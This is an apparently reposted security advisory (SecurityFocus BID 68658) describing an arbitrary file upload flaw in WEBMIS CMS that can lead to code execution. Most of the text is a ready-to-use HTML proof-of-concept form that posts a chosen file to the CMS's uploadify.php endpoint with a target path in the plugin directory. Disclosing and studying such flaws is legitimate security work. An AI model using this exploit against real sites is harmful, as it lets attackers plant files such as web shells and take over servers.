16 lines
No EOL
709 B
HTML
16 lines
No EOL
709 B
HTML
source: https://www.securityfocus.com/bid/68658/info
|
|
|
|
WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files.
|
|
|
|
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
|
|
|
|
<form
|
|
action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php"
|
|
method="post"
|
|
enctype="multipart/form-data">
|
|
<label for="file">Filename:</label>
|
|
<input type="file" name="Filedata" ><br>
|
|
<input type=text name="path" value="/webmis_installation/plugin/">
|
|
<input type=text name="someKey" value="someValue"]>
|
|
<input type="submit" name="submit" value="Submit">
|
|
</form> |